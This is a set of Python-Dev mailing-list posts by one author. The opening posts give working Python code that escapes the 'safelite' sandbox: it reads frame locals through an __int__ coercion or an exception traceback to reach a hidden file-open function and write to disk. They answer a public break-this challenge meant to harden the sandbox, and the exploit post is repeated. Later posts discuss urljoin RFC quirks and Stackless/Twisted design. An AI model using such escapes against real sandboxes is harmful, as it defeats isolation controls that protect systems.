Re: [Python-Dev] Challenge: Please break this! [Now with blog post]
Another hole. Not as devious as some, but easy to fix with yet another
type check. And probably you want to get rid of "get_frame" from safelite.

This trick notices 'buffering' is passed to open, which does an int
coerce of non-int objects. I can look up the stack frames and get
"open_file", which I can then use for whatever I want. In this case, I
used the hole to reimplement 'open' in its entirety.

import safelite

class GetAccess(object):
    def __init__(self, filename, mode, buffering):
        self.filename = filename
        self.mode = mode
        self.buffering = buffering
        self.f = None

    def __int__(self):
        # Get access to the calling frame.
        # (Strange that that function is available.)
        frame = safelite.get_frame(1)

        # Look at that nice function right there.
        open_file = frame.f_locals["open_file"]

        # Get around restricted mode
        locals_d = {}
        exec """
def breakout(open_file, filename, mode, buffering):
    return open_file(filename, mode, buffering)
""" in frame.f_globals, locals_d
        del frame

        # Call the function
        self.f = locals_d["breakout"](open_file, self.filename,
                                      self.mode, self.buffering)
        # Jump outta here
        raise TypeError

def open(filename, mode="r", buffering=0):
    get_access = GetAccess(filename, mode, buffering)
    try:
        safelite.FileReader("whatever", "r", get_access)
    except TypeError:
        return get_access.f

f = open("busted.txt", "w")
f.write("Broke out of jail!\n")
f.close()
print "Message is:", repr(open("busted.txt").read())

Andrew Dalke
da...@dalkescientific.com
Re: [Python-Dev] Challenge: Please break this! [Now with blog post]
Another hole. Not as devious as some, but easy to fix with yet another
type check.

This trick notices 'buffering' is passed to open, which does an int
coerce of non-int objects. I can look up the stack frames and get
"open_file", which I can then use for whatever I want. In this case, I
used the hole to reimplement 'open' in its entirety.

import safelite

class GetAccess(object):
    def __init__(self, filename, mode, buffering):
        self.filename = filename
        self.mode = mode
        self.buffering = buffering
        self.f = None

    def __int__(self):
        # Get access to the calling frame.
        # (Strange that that function is available, but I
        # could do it the old-fashioned way and raise/
        # catch an exception)
        frame = safelite.get_frame(1)

        # Look at that nice function right there.
        open_file = frame.f_locals["open_file"]

        # Get around restricted mode
        locals_d = {}
        exec """
def breakout(open_file, filename, mode, buffering):
    return open_file(filename, mode, buffering)
""" in frame.f_globals, locals_d
        del frame

        # Call the function
        self.f = locals_d["breakout"](open_file, self.filename,
                                      self.mode, self.buffering)
        # Jump outta here
        raise TypeError

def open(filename, mode="r", buffering=0):
    get_access = GetAccess(filename, mode, buffering)
    try:
        safelite.FileReader("whatever", "r", get_access)
    except TypeError:
        return get_access.f

f = open("busted.txt", "w")
f.write("Broke out of jail!\n")
f.close()
print "Message is:", repr(open("busted.txt").read())

Andrew Dalke
da...@dalkescientific.com
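[The "yet another type check" mentioned at the top of this message would be
something along these lines -- a minimal sketch, not safelite's actual code;
the helper name and its placement inside the FileReader wrapper are
assumptions made for illustration.]

    # Hypothetical hardening inside safelite's FileReader wrapper: refuse any
    # buffering value that is not already a real int, so __int__ on an
    # attacker-supplied object is never invoked during the coercion.
    def _check_buffering(buffering):
        if not isinstance(buffering, int):
            raise TypeError("buffering must be an int, not %r"
                            % type(buffering).__name__)
        return buffering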
Re: [Python-Dev] Challenge: Please break this! [Now with blog post]
tav:
> But the challenge was about doing `from safelite import FileReader`.

Though it doesn't say so in the first post of this thread nor on your page at
http://tav.espians.com/a-challenge-to-break-python-security.html
It says "Now find a way to write to the filesystem from your interpreter".
Which is what I did. Who's to say your final implementation will be more
secure ;)  But I see your point. Perhaps update the description for those
misguided souls like me?

> This is just a challenge to see if the model holds

I haven't been watching this discussion closely and I can't find mention of
this - is the goal to support only 2.x or also support Python 3? Your model
seems to assume 2.x only, and there may be 3.x attacks that aren't
considered in the challenge.

For example, in Python 3 I would use the __traceback__ attribute of the
exception object to reach in and get the open function. That seems morally
equivalent to what I did. I hacked out the parts of safelite.py which
wouldn't work in Python 3. Following is a variation on the theme.

import safelite

try:
    safelite.FileReader("/dev/null", "r", "x")
except TypeError as err:
    frame = err.__traceback__.tb_next.tb_frame
    frame.f_locals["open_file"]("test.txt", "w").write("done.")

> And instead of trying to make tb_frame go away, I'd like to add the
> following to my proposed patch of RESTRICTED attributes:
>
>   * f_code
>   * f_builtins
>   * f_globals
>   * f_locals

which of course would make the above no longer work.

Cheers,
Andrew
da...@dalkescientific.com
Re: [Python-Dev] Challenge: Please break this! [Now with blog post]
On Tue, Feb 24, 2009 at 3:05 PM, tav wrote:
> And instead of trying to make tb_frame go away, I'd like to add the
> following to my proposed patch of RESTRICTED attributes:
>
>   * f_code
>   * f_builtins
>   * f_globals
>   * f_locals
>
> That seems to do the trick...

A goal is to use this in App Engine, yes? Which uses cgitb to report
errors? Which needs these restricted frame attributes to report the values
of variables when the error occurred?

Andrew Dalke
da...@dalkescientific.com
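[For context, this is a rough sketch of what cgitb-style error reporting has
to do -- walk the traceback and read each frame's code object and locals. It
is not part of the original message, just an illustration of why restricting
f_code and f_locals would break that kind of tool.]

    import sys

    def report_variables(exc_info):
        # Walk every frame in the traceback and print its local variables,
        # roughly the way cgitb does when building its error report.
        tb = exc_info[2]
        while tb is not None:
            frame = tb.tb_frame
            print frame.f_code.co_name                    # needs f_code
            for name, value in frame.f_locals.items():    # needs f_locals
                print "   ", name, "=", repr(value)
            tb = tb.tb_next

    try:
        1 / 0
    except ZeroDivisionError:
        report_variables(sys.exc_info())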
Re: [Python-Dev] Path object design
glyph:
> Path manipulation:
>
>  * This is confusing as heck:
>    >>> os.path.join("hello", "/world")
>    '/world'
>    >>> os.path.join("hello", "slash/world")
>    'hello/slash/world'
>    >>> os.path.join("hello", "slash//world")
>    'hello/slash//world'
>    Trying to formulate a general rule for what the arguments to
>    os.path.join are supposed to be is really hard.  I can't really figure
>    out what it would be like on a non-POSIX/non-win32 platform.

Made trickier by the similar yet different behaviour of urlparse.urljoin.

>>> import urlparse
>>> urlparse.urljoin("hello", "/world")
'/world'
>>> urlparse.urljoin("hello", "slash/world")
'slash/world'
>>> urlparse.urljoin("hello", "slash//world")
'slash//world'
>>>

It does not make sense to me that these should be different.

Andrew
[EMAIL PROTECTED]

[Apologies to glyph for the dup; mixed up the reply-to. Still getting used
to gmail.]
Re: [Python-Dev] Path object design
Martin:
> Just in case this isn't clear from Steve's and Fredrik's
> post: The behaviour of this function is (or should be)
> specified, by an IETF RFC. If somebody finds that non-intuitive,
> that's likely because their mental model of relative URIs
> deviate's from the RFC's model.

I didn't realize that urljoin is only supposed to be used with a base URL,
where "base URL" (used in the docstring) has a specific requirement that it
be absolute. I instead saw the word "join" and figured it should do roughly
the same thing as os.path.join.

>>> import urlparse
>>> urlparse.urljoin("file:///path/to/hello", "slash/world")
'file:///path/to/slash/world'
>>> urlparse.urljoin("file:///path/to/hello", "/slash/world")
'file:///slash/world'
>>> import os
>>> os.path.join("/path/to/hello", "slash/world")
'/path/to/hello/slash/world'
>>>

It does not. My intuition, nowadays highly influenced by URLs, is that with
a couple of hypothetical functions for going between filenames and URLs:

    os.path.join(absolute_filename, filename) ==
        file_url_to_filename(urlparse.urljoin(
            filename_to_file_url(absolute_filename),
            filename_to_file_url(filename)))

which is not the case. os.path.join assumes the base is a directory name
when used in a join, "inserting '/' as needed", while RFC 1808 says

    The last segment of the base URL's path (anything
    following the rightmost slash "/", or the entire
    path if no slash is present) is removed

Is my intuition wrong in thinking those should be the same? I suspect it
is. I've been very glad that when I ask for a directory name I don't need
to check that it ends with a "/".

urljoin's behaviour is correct for what it's doing. os.path.join is better
for what it's doing. (And about once a year I manually verify the
difference because I get unsure.) I think these should not share the "join"
in the name.

If urljoin is not meant for relative base URLs, should it raise an
exception when misused? Hmm, though the RFC algorithm does not have a
failure mode and the result may be a relative URL. Consider

>>> urlparse.urljoin("http://blah.com/a/b/c", "..")
'http://blah.com/a/'
>>> urlparse.urljoin("http://blah.com/a/b/c", "../")
'http://blah.com/a/'
>>> urlparse.urljoin("http://blah.com/a/b/c", "../..")
'http://blah.com/'
>>> urlparse.urljoin("http://blah.com/a/b/c", "../../")
'http://blah.com/'
>>> urlparse.urljoin("http://blah.com/a/b/c", "../../..")
'http://blah.com/'
>>> urlparse.urljoin("http://blah.com/a/b/c", "../../../")
'http://blah.com/../'
>>> urlparse.urljoin("http://blah.com/a/b/c", "../../../..")   # What?!
'http://blah.com/'
>>> urlparse.urljoin("http://blah.com/a/b/c", "../../../../")
'http://blah.com/../../'
>>>

> Of course, there is also the chance that the implementation
> deviates from the RFC; that would be a bug.

The comment in urlparse

    # XXX The stuff below is bogus in various ways...

is ever so reassuring. I suspect there's a bug given the previous code. Or
I've a bad mental model. ;)

Andrew
[EMAIL PROTECTED]
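[To make the hypothetical equivalence above concrete: the two helper
functions could be sketched with the stdlib's urllib conversion routines,
after which the mismatch between the two notions of "join" is easy to see.
This is not from the original post; the helper names follow the message,
the implementations are rough POSIX-only sketches.]

    import os
    import urllib
    import urlparse

    def filename_to_file_url(path):
        # Rough sketch: absolute paths become file:// URLs, relative paths
        # become relative URL references; Windows drive letters are ignored.
        if os.path.isabs(path):
            return "file://" + urllib.pathname2url(path)
        return urllib.pathname2url(path)

    def file_url_to_filename(url):
        return urllib.url2pathname(urlparse.urlsplit(url)[2])

    base, rel = "/path/to/hello", "slash/world"
    print os.path.join(base, rel)
    # -> '/path/to/hello/slash/world'
    print file_url_to_filename(urlparse.urljoin(filename_to_file_url(base),
                                                filename_to_file_url(rel)))
    # -> '/path/to/slash/world', so the two joins disagree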
Re: [Python-Dev] Path object design
Steve:
> > I'm darned if I know. I simply know that it isn't right for http resources.

/F:
> the URI specification disagrees; an URI that starts with "../" is per-
> fectly legal, and the specification explicitly states how it should be
> interpreted.

I have looked at the spec, and can't figure out how its explanation matches
the observed urljoin results. Steve's excerpt trimmed out the strangest
example.

>>> urlparse.urljoin("http://blah.com/a/b/c", "../../../")
'http://blah.com/../'
>>> urlparse.urljoin("http://blah.com/a/b/c", "../../../..")   # What?!
'http://blah.com/'
>>>

> (it's important to realize that "urijoin" produces equivalent URI:s, not
> file names)

Both, though, are "paths". The OP, Mike Orr, wrote:

    I agree that supporting non-filesystem directories (zip files,
    CSV/Subversion sandboxes, URLs) would be nice, but we already have a
    big enough project without that. What constraints should a Path object
    keep in mind in order to be forward-compatible with this?

Is the answer therefore that URLs and URI behaviour should not place
constraints on a Path object because they are sufficiently dissimilar from
file-system paths? Do these other non-FS hierarchical structures have
similar differences causing a semantic mismatch?

Andrew
[EMAIL PROTECTED]
Re: [Python-Dev] Path object design
Martin:
> Unfortunately, you didn't say which of these you want explained.
> As it is tedious to write down even a single one, I restrain to the
> one with the What?! remark.
>
> > urlparse.urljoin("http://blah.com/a/b/c", "../../../..")  # What?!
> > 'http://blah.com/'

The "What?!" is in context with the previous and next entries. I've reduced
it to a simpler case

>>> urlparse.urljoin("http://blah.com/", "..")
'http://blah.com/'
>>> urlparse.urljoin("http://blah.com/", "../")
'http://blah.com/../'
>>> urlparse.urljoin("http://blah.com/", "../..")
'http://blah.com/'

Does the result make sense to you? Does it make sense that the last of
these is shorter than the middle one? It sure doesn't to me.

I thought it was obvious that there was an error; obvious enough that I
didn't bother to track down why - especially as my main point was to argue
that there are different ways to deal with hierarchical/path-like schemes,
each correct for its given domain.

> Please follow me through section 5 of
>
> http://www.ietf.org/rfc/rfc3986.txt

The core algorithm causing the "what?!" comes from remove_dot_segments,
section 5.2.4. In parallel my 3 cases should give:

  5.2.4 Remove Dot Segments

  remove_dot_segments("/..")    r_d_s("/../")          r_d_s("/../..")
  1.  I = "/..",  O = ""        I = "/../",  O = ""    I = "/../..",  O = ""
  2A. (does not apply)          2A. (does not apply)   2A. (does not apply)
  2B. (does not apply)          2B. (does not apply)   2B. (does not apply)
  2C. O = "", I = "/"           2C. O = "", I = "/"    2C. O = "", I = "/.."
  2A. (does not apply)          2A. (does not apply)     .. reduces to
  2B. (does not apply)          2B. (does not apply)        r_d_s("/..")
  2C. (does not apply)          2C. (does not apply)   3.  Result "/"
  2D. (does not apply)          2D. (does not apply)
  2E. O = "/", I = ""           2E. O = "/", I = ""
  3.  Result: "/"               3.  Result "/"

My reading of RFC 3986 says all three examples should produce the same
result. The fact that my "what?!" comment happens to be correct according
to that RFC is purely coincidental.

Then again, urlparse.py does *not* claim to be RFC 3986 compliant. The
module docstring is

    """Parse (absolute and relative) URLs.

    See RFC 1808: "Relative Uniform Resource Locators", by R. Fielding,
    UC Irvine, June 1995.
    """

I tried the same code with 4Suite, which does claim compliance, and get

>>> import Ft
>>> from Ft.Lib import Uri
>>> Uri.Absolutize("..", "http://blah.com/")
'http://blah.com/'
>>> Uri.Absolutize("../", "http://blah.com/")
'http://blah.com/'
>>> Uri.Absolutize("../..", "http://blah.com/")
'http://blah.com/'
>>>

The text of its Uri.py says

    This function is similar to urlparse.urljoin() and urllib.basejoin().
    Those functions, however, are (as of Python 2.3) outdated, buggy, and/or
    designed to produce results acceptable for use with other core Python
    libraries, rather than being earnest implementations of the relevant
    specs. Their problems are most noticeable in their handling of
    same-document references and 'file:' URIs, both being situations that
    come up far too often to consider the functions reliable enough for
    general use.
    """
    # Reasons to avoid using urllib.basejoin() and urlparse.urljoin():
    # - Both are partial implementations of long-obsolete specs.
    # - Both accept relative URLs as the base, which no spec allows.
    # - urllib.basejoin() mishandles the '' and '..' references.
    # - If the base URL uses a non-hierarchical or relative path,
    #   or if the URL scheme is unrecognized, the result is not
    #   always as expected (partly due to issues in RFC 1808).
    # - If the authority component of a 'file' URI is empty,
    #   the authority component is removed altogether. If it was
    #   not present, an empty authority component is in the result.
    # - '.' and '..' segments are not always collapsed as well as they
    #   should be (partly due to issues in RFC 1808).
    # - Effective Python 2.4, urllib.basejoin() *is* urlparse.urljoin(),
    #   but urlparse.urljoin() is still based on RFC 1808.

In searching the archives

  http://mail.python.org/pipermail/python-dev/2005-September/056152.html

Fabien Schwob:
> I'm using the module urlparse and I think I've found a bug in the
> urlparse module. When you merge an url and a link
> like "../../../page.html" with urljoin, the new url created keep some
> "../" in it. Here is an example :
>
> >>> import urlparse
> >>> begin = "http://www.example.com/folder/page.html"
> >>> end = "../../../otherpage.html"
> >>> urlparse.urljoin(begin, end)
> 'http://www.example.com/../../otherpage.html'

Guido:
> You shouldn't be giving more "../" sequences than are possible. I find
> the current behavior acceptable.

(Apparently for RFC 1808 that's a valid answer; it was an implementation
choice in how to handle that case.)

While not directly relevant, postings like John J Lee's
http://mail.python.org/pipermail/python-bugs-lis
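[To make the hand trace above concrete, here is a small transcription of the
remove_dot_segments algorithm from RFC 3986 section 5.2.4. It is not part of
the original message and is deliberately simplified -- just enough to cover
the cases traced above.]

    def remove_dot_segments(path):
        # Rough transcription of RFC 3986 section 5.2.4.
        inp, out = path, ""
        while inp:
            if inp.startswith("../"):                       # 2A
                inp = inp[3:]
            elif inp.startswith("./"):                      # 2A
                inp = inp[2:]
            elif inp.startswith("/./"):                     # 2B
                inp = "/" + inp[3:]
            elif inp == "/.":                               # 2B
                inp = "/"
            elif inp.startswith("/../"):                    # 2C
                inp = "/" + inp[4:]
                out = out[:out.rfind("/")] if "/" in out else ""
            elif inp == "/..":                              # 2C
                inp = "/"
                out = out[:out.rfind("/")] if "/" in out else ""
            elif inp in (".", ".."):                        # 2D
                inp = ""
            else:                                           # 2E
                cut = inp.find("/", 1)
                if cut == -1:
                    out, inp = out + inp, ""
                else:
                    out, inp = out + inp[:cut], inp[cut:]
        return out

    for rel in ("/..", "/../", "/../.."):
        print rel, "->", repr(remove_dot_segments(rel))
    # all three print '/', matching the hand trace above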
Re: [Python-Dev] Path object design
Me [Andrew]:
> > As this is not a bug, I have added the feature request 1591035 to SF
> > titled "update urlparse to RFC 3986". Nothing else appeared to exist
> > on that specific topic.

Martin:
> Thanks. It always helps to be more specific; being less specific often
> hurts.

So does being more specific. I wasn't trying to report a bug in urlparse. I
figured everyone knew the problems existed. The code comments say so and
various back discussions on this list say so. All I wanted to do was point
out that two seemingly similar problems - path traversal of hierarchical
structures - had two different expected behaviors.

Now I've spent entirely too much time on specifics I didn't care about and
didn't think were important. I've also been known to do the full report and
have people ignore what I wrote because it was too long.

> I find there is a difference between "urllib behaves
> non-intuitively" and "urllib gives result A for parameters B and C,
> but should give result D instead". Can you please add specific examples
> to your report that demonstrate the difference between implemented
> and expected behavior?

No. I consider the "../" cases to be unimportant edge cases and I would
rather people fixed the other problems highlighted in the text I copied
from 4Suite's Uri.py -- like improperly allowing a relative URL as the base
url, which I incorrectly assumed was legit - and that others have reported
on python-dev, easily found with Google. If I only add test cases for "../"
then I believe that that's all that will be fixed.

Given the back history of this problem and lack of followup I also believe
it won't be fixed unless someone develops a brand new module, from scratch,
which will be added to some future Python version. There's probably a
compliance suite out there to use for this sort of task. I hadn't bothered
to look as I am no more proficient than others here at Google.

Finally, I see that my report is a dup. SF search is poor. As Nick Coghlan
reported, Paul Jimenez has a replacement for urlparse, summarized in

  http://www.python.org/dev/summary/2006-04-01_2006-04-15/

It was submitted in spring as a patch - SF# 1462525 at

  http://sourceforge.net/tracker/index.php?func=detail&aid=1462525&group_id=5470&atid=305470

which I didn't find in my earlier searching.

Andrew
[EMAIL PROTECTED]
Re: [Python-Dev] Path object design
Martin:
> It still should be possible to come up with examples for these as
> well, no? For example, if you pass a relative URI as the base
> URI, what would you like to see happen?

Until two days ago I didn't even realize that was an incorrect use of
urljoin. I can't be the only one. Hence, raise an exception - just like
4Suite's Uri.py does.

> That's true. Actually, it's probably not true; it will only get fixed
> if some volunteer contributes a fix.

And it's not I. A true fix is a lot of work. I would rather use Uri.py, now
that I see it handles everything I care about, and then some. Eg, file name
<-> URI conversion.

> So do you think this patch meets your requirements?

# new
>>> uriparse.urljoin("http://spam/", "foo/bar")
'http://spam//foo/bar'
>>>
# existing
>>> urlparse.urljoin("http://spam/", "foo/bar")
'http://spam/foo/bar'
>>>

No. That was the first thing I tried. Also found

>>> urlparse.urljoin("http://blah", "/spam/")
'http://blah/spam/'
>>> uriparse.urljoin("http://blah", "/spam/")
'http://blah/spam'
>>>

I reported these on the patch page. Nothing else strange came up, but I did
only try http urls and not the others.

My "requirements", meaning my vague, spur-of-the-moment thoughts without
any research or experimentation to determine their validity, are different
than those for Python. My real requirements are met by the existing code.
My imagined ones include support for edge cases, the idna codec, unicode,
and real-world use on a variety of OSes. 4Suite's Uri.py seems to have
this. Eg, lots of edge-case code like

    # On Windows, ensure that '|', not ':', is used in a drivespec.
    if os.name == 'nt' and scheme == 'file':
        path = path.replace(':', '|', 1)

Hence the uriparse.py patch does not meet my hypothetical requirements.

Python's requirements are probably to get closer to the spec. In which case
yes, it's at least as good as and likely generally better than the existing
module, modulo a few API naming debates and perhaps some rough edges which
will be found when put into use. And perhaps various arguments about how
bug compatible it should be and whether the old code should be available as
well as the new one, for those who depend on the existing 1808-allowed
implementation-dependent behavior. For those I have not the experience to
guide me and no care to push the debate.

I've decided I'm going to experiment with using 4Suite's Uri.py for my code
because it handles things I want which are outside of the scope of
uriparse.py.

> This topic (URL parsing) is not only inherently difficult to
> implement, it is just as tedious to review. Without anybody
> reviewing the contributed code, it's certain that it will never
> be incorporated.

I have a different opinion. Python's url manipulation code is a mess.
urlparse, urllib, urllib2. Why is "urlencode" part of urllib and not
urllib2? For that matter, urllib is labeled 'Open an arbitrary URL' and not
'and also do manipulations on parts of URLs.' I don't want to start fixing
code because doing it the way I want to requires a new API and a much
better understanding of the RFCs than I care about, especially since 4Suite
and others have already done this. Hence I would say to just grab their
library. And perhaps update the naming scheme.

Also, urlgrabber and pycURL are better for downloading arbitrary URIs. For
some definitions of "better".

Andrew
[EMAIL PROTECTED]
Re: [Python-Dev] Path object design
Andrew:
> >>> urlparse.urljoin("http://blah.com/", "..")
> 'http://blah.com/'
> >>> urlparse.urljoin("http://blah.com/", "../")
> 'http://blah.com/../'
> >>> urlparse.urljoin("http://blah.com/", "../..")
> 'http://blah.com/'

/F:
> as I said, today's urljoin doesn't guarantee that the output is
> the *shortest* possible way to represent the resulting URI.

I didn't think anyone was making that claim. The module claims RFC 1808
compliance. From the docstring:

    DESCRIPTION
        See RFC 1808: "Relative Uniform Resource Locators", by R. Fielding,
        UC Irvine, June 1995.

Now quoting from RFC 1808:

    5.2. Abnormal Examples

    Although the following abnormal examples are unlikely to occur in
    normal practice, all URL parsers should be capable of resolving them
    consistently. Each example uses the same base as above.

    An empty reference resolves to the complete base URL:

        <> = <URL:http://a/b/c/d;p?q#f>

    Parsers must be careful in handling the case where there are more
    relative path ".." segments than there are hierarchical levels in the
    base URL's path.

My claim is that "consistent" implies "in the spirit of the rest of the
RFC" and "to a human trying to make sense of the results" and not only mean
"does the same thing each time." Else

>>> urljoin("http://blah.com/", "../../..")
'http://blah.com/there/were/too/many/dot-dot/path/elements/in/the/relative/url'

would be equally consistent.

>>> for rel in ".. ../ ../.. ../../ ../../.. ../../../ ../../../..".split():
...     print repr(rel), repr(urlparse.urljoin("http://blah.com/", rel))
...
'..' 'http://blah.com/'
'../' 'http://blah.com/../'
'../..' 'http://blah.com/'
'../../' 'http://blah.com/../../'
'../../..' 'http://blah.com/../'
'../../../' 'http://blah.com/../../../'
'../../../..' 'http://blah.com/../../'

I grant there is a consistency there. It's not one most would have
predicted beforehand. Then again, "should" is that wishy-washy "unless
you've got a good reason to do it a different way" sort of constraint.

Andrew
[EMAIL PROTECTED]
Re: [Python-Dev] Twisted Isn't Specific (was Re: Trial balloon: microthreads library in stdlib)
I was the one on the Stackless list who last September or so proposed the
idea of monkeypatching, and I'm including that idea in my presentation for
PyCon. See my early rough draft at

  http://www.stackless.com/pipermail/stackless/2007-February/002212.html

which contains many details about using Stackless, though none on the
Stackless implementation. (A lot on how to tie things together.)

So people know, I am an applications programmer and not a systems
programmer. Things like OS-specific event mechanisms annoy and frustrate
me. If I could do away with hardware and still write useful programs I
would.

I have tried 3 times to learn Twisted. The first time I found and reported
various problems and successes. See emails at
  http://www.twistedmatrix.com/pipermail/twisted-python/2003-June/thread.html
The second time was to investigate a way to report upload progress:
  http://twistedmatrix.com/trac/ticket/288
and the third was to compare Allegra and Twisted:
  http://www.dalkescientific.com/writings/diary/archive/2006/08/28/levels_of_abstraction.html

In all three cases I've found it hard to use Twisted because the code
didn't do as I expected it to do, and when something went wrong I got
results which were hard to interpret. I believe others have similar
problems, which is one reason Twisted is considered to be "a big,
complicated, inseparable hairy mess."

I find the Stackless code also hard to understand. Eg, I don't know where
the watchdog code is for the "run()" command. It uses several layers of
macros and I haven't been able to get it straight in my head. However, so
far I've not run into strange errors in Stackless that I have in Twisted. I
find the normal Python code relatively easy to understand.

Stackless only provides threadlets. It does no I/O. Richard Tew developed a
"stacklesssocket" module which emulates the API for the stdlib "socket"
module. I tweaked it a bit and showed that by doing the monkeypatch

    import stacklesssocket
    import sys
    sys.modules["socket"] = stacklesssocket

then code like "urllib.urlopen" became Stackless compatible. Eg, in my
PyCon talk draft I show something like

    import slib  # must monkeypatch before any other module imports "socket"
    slib.use_monkeypatch()

    import urllib2
    import time
    import hashlib

    def fetch_and_reverse(host):
        t1 = time.time()
        s = urllib2.urlopen("http://" + host + "/").read()[::-1]
        dt = time.time() - t1
        digest = hashlib.md5(s).hexdigest()
        print "hash of %r/ = %s in %.2f s" % (host, digest, dt)

    slib.main_tasklet(fetch_and_reverse)("www.python.org")
    slib.main_tasklet(fetch_and_reverse)("docs.python.org")
    slib.main_tasklet(fetch_and_reverse)("planet.python.org")
    slib.run_all()

where the three fetches occur in parallel.

The choice of asyncore is, I think, done because 1) it prevents needing an
external dependency, 2) asyncore is smaller and easier to understand than
Twisted, and 3) it was for demo/proof of concept purposes. While tempting
to improve that module, I know that Twisted has already gone through all
the platform-specific crap and I don't want to go through it again myself.
I don't want to write a reactor to deal with GTK, and one for OS X, and one
for ...

Another reason I think Twisted is considered "tangled-up Deep Magic, only
for Wizards Of The Highest Order" is because it's infused with event-based
processing. I've done a lot of SAX processing and I can say that few people
think that way or want to go through the process of learning how.

Compare, for example, the following

    f = urllib2.urlopen("http://example.com/")
    for i, line in enumerate(f):
        print ("%06d" % i), repr(line)

with the normal equivalent in Twisted or another async-based system. Yet by
using the Stackless socket monkeypatch, this same code works in an async
framework. And the underlying libraries have a much larger developer base
than Twisted. Want NNTP? "import nntplib". Want POP3? "import poplib".
Plenty of documentation about them too.

On the Stackless mailing list I have proposed someone work on a talk for
EuroPython titled "Stackless and Twisted". Andrew Francis has been looking
into how to do that.

All the earlier quotes were lifted from glyph. Here's another:

> When you boil it down, Twisted's event loop is just a
> notification for "a connection was made", "some data was
> received on a connection", "a connection was closed", and
> a few APIs to listen or initiate different kinds of
> connections, start timed calls, and communicate with threads.
> All of the platform details of how data is delivered to the
> connections are abstracted away.  How do you propose we
> would make a less "specific" event mechanism?

What would I need to do to extract this Twisted core so I could replace
asyncore? I know at minimum I need "twisted.internet" and "twisted.python"
(the latter for logging) and "twisted.persisted" for "styles.Ephemeral".
But I say this hesitantly, recalling the frustrations I had in dealing with a co
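[For contrast with the enumerate() loop above, here is a rough sketch -- not
from the original message and not real Twisted code -- of the inside-out,
callback style the same line-printing task takes in an event-driven
framework. fetch_page, its callback hooks, and the fake driver are all
hypothetical names invented for illustration.]

    # Hypothetical event-driven equivalent of the blocking loop above.
    # The work is split across callbacks instead of reading top to bottom.
    def print_numbered_lines(fetch_page):
        state = {"lineno": 0}

        def on_line(line):
            print ("%06d" % state["lineno"]), repr(line)
            state["lineno"] += 1

        def on_error(reason):
            print "fetch failed:", reason

        # fetch_page is assumed to call on_line once per received line and
        # on_error if the connection fails; control never "blocks" here.
        fetch_page("http://example.com/", on_line, on_error)

    def fake_fetch_page(url, on_line, on_error):
        # Toy stand-in for an event-loop-driven fetch: just feeds two lines.
        for line in ("<html>\n", "</html>\n"):
            on_line(line)

    print_numbered_lines(fake_fetch_page)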
Re: [Python-Dev] Trial balloon: microthreads library in stdlib
On 2/14/07, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote in response to
[EMAIL PROTECTED]:
> As far as I can tell, you still haven't even clearly expressed what your
> needs are, let alone whether or not Twisted is suitable. In the reply
> you're citing, you said that "this" sounded like something "low level" that
> "twisted would be written on top of" - but the "this" you were talking
> about, based on your previous messages, sounded like monkeypatching the
> socket and asyncore modules to provide asynchronous file I/O based on the
> platform-specific IOCP API for Windows.

I don't know Richard's needs nor requirements. I do know the mechanism of
the monkeypatch he's talking about. I describe it a bit in my draft for my
Stackless talk at PyCon

  http://www.stackless.com/pipermail/stackless/2007-February/002212.html

It uses asyncore for the I/O and a scheduler which can figure out if there
are other running tasklets and how long is needed until the next tasklet
needs to wake up.

Yes, this is another reactor. Yes, it's not widely cross-platform. Yes, it
doesn't work with gtk and other GUI frameworks. Yes, as written it doesn't
handle threads. But also yes, it's a different style of writing reactors
because of how Stackless changes the control flow.

I and others would like to see something like the "stacklesssocket"
implemented on top of Twisted. Andrew Francis is looking into it but I
don't know to what degree of success he's had. Err, looking through the
email archive, he has had some difficulties in doing a Twisted/Stackless
integration. I don't think Twisted people understand Stackless well enough
(nor obviously he Twisted) or what he's trying to do.

> > It is a large dependency and it is a secondary framework.
>
> Has it occurred to you that it is a "large" dependency not because we like
> making bloated and redundant code, but because it is doing something that is
> actually complex and involved?

Things like Twisted's support for NNTP, POP3, etc. aren't needed with the
monkeypatch approach because the standard Python libraries will work, with
Stackless and the underlying async library collaborating under the covers.
So those parts of Twisted aren't needed or relevant. Twisted is, after all,
many things.

> I thought that I provided several reasons before as well, but let me state
> them as clearly as I can here. Twisted is a large and mature framework with
> several years of development and an active user community. The pluggable
> event loop it exposes is solving a hard problem, and its implementation
> encodes a lot of knowledge about how such a thing might be done. It's also
> tested on a lot of different platforms.
>
> Writing all this from scratch - even a small subset of it - is a lot of
> work, and is unlikely to result in something robust enough for use by all
> Python programs without quite a lot of effort. It would be a lot easier to
> get the Twisted team involved in standardizing event-driven communications
> in Python. Every other effort I'm aware of is either much smaller, entirely
> proprietary, or both. Again, I would love to be corrected here, and shown
> some other large event-driven framework in Python that I was heretofore
> unaware of.

Sorry for the long quote; wasn't sure how to trim it. I made this point
elsewhere and above but feel it's important enough to emphasize once more.
Stackless lets people write code which looks like blocking code but which
is not. The blocking functions are forwarded to the reactor, which does
whatever it's supposed to do, and the results returned.

Because most Python networking code will work unchanged (assuming changes
to the underlying APIs to work with Stackless, as we hack now through
monkeypatches), a microthreads solution almost automatically and trivially
gains a large working code base, documentation, and active developer base.
There does not need to be "some other large event-driven framework in
Python" because all that's needed is the 13kLOC of reactor code from
twisted.internet and not 140+kLOC in all of Twisted.

> Standardization is much easier to achieve when you have
> multiple interested parties with different interests to accommodate. As
> Yitzhak Rabin used to say, "you don't engage in API standardization with
> your friends, you engage in API standardization with your enemies" - or...
> something like that.

I thought you made contracts even with -- or especially with -- your
friends regarding important matters so that both sides know what they are
getting into and so you don't become enemies in the future.

> You say that you weren't proposing an alternate implementation of an event
> loop core, so I may be reacting to something you didn't say at all.
> However, again, at least Tristan thought the same thing, so I'm not the
> only one.

For demonstration (and in my case pedagogical reasons) we have an event
core loop. I would rather pull out the parts I need from Twisted. I don't
know how. I don't
Re: [Python-Dev] Twisted Isn't Specific (was Re: Trial balloon: microthreads library in stdlib)
> On Thu, 15 Feb 2007 10:46:05 -0500, "A.M. Kuchling" <[EMAIL PROTECTED]> wrote:
> > It's hard to debug the resulting problem. Which level of the *12*
> > levels in the stack trace is responsible for a bug? Which of the *6*
> > generic calls is calling the wrong thing because a handler was set up
> > incorrectly or the wrong object provided? The code is so 'meta' that
> > it becomes effectively undebuggable.

On 2/15/07, Jean-Paul Calderone <[EMAIL PROTECTED]> wrote:
> I've debugged plenty of Twisted applications. So it's not undebuggable. :)

Hence the word "effectively". Or are you offering to be on-call within 5
minutes for anyone wanting to debug code? Not very scalable, that. The code
I was talking about took me an hour to track down, and I could only find
the location by inserting a "print traceback" call to figure out where I
was.

> Application code tends to reside at the bottom of the call stack, so Python's
> traceback order puts it right where you're looking, which makes it easy to
